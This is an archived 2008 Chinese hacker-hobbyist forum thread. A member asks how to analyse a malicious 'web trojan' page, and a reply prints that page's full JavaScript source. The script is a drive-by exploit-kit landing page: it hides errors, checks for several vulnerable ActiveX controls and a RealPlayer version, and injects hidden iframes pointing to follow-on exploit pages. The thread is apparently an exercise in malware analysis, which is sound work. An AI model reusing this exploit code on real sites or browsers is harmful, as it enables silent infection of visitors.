【3.A.S.T】网络安全爱好者's Archiver

黑客学习

rocksun007 发表于 2008-12-30 15:31

老大帮帮忙。。

hxxp://wm.sllgqsb.cn/a350/fxx.htm
这个是网马地址,怎么才能破解,把木马下载下来?

那天晚上 发表于 2008-12-30 16:45

有问题含虾肉|

那天晚上 发表于 2008-12-30 16:54

有问题 找 小柔

1335csy 发表于 2008-12-30 17:39

文件 另存为   看有没有用

柔肠寸断 发表于 2008-12-30 19:06

该页面的内容为

<Script>

document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");

document.write("");

document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");

window.status="完成";

window.onerror=function(){return true;}

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)

document.write("<Iframe width=100 height=0 src=../a1/Ms06014.htm></iframe>");

try{var m;

var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}

catch(m){};                     

finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}

try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";

var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}

catch(n){};                     

finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");

document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";

try{var b;

var ml=new ActiveXObject("MPS.StormPlayer");}

catch(b){};                     

finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}

try{var f;

var gw=new ActiveXObject("GLIEDown.IEDown.1");}

catch(f){};                     

finally{if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}

function test()

{

rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

Like = new ActiveXObject(rrooxx);

}catch(error){return;}

vvvvv = Like.PlayerProperty("PRODUCTVERSION");

if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";

document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}

else

document.write('<iframe style=display:none src="../a1/real.html"></iframe>');

}

test();

document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";

</script>

柔肠寸断 发表于 2008-12-30 19:09

然后再一个个页面分析

我分析用的工具是HTTPEDBUG

我们的黑客兵器里有下载 的

hilarylove 发表于 2008-12-30 20:50

我们的小柔很牛逼哦。。

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.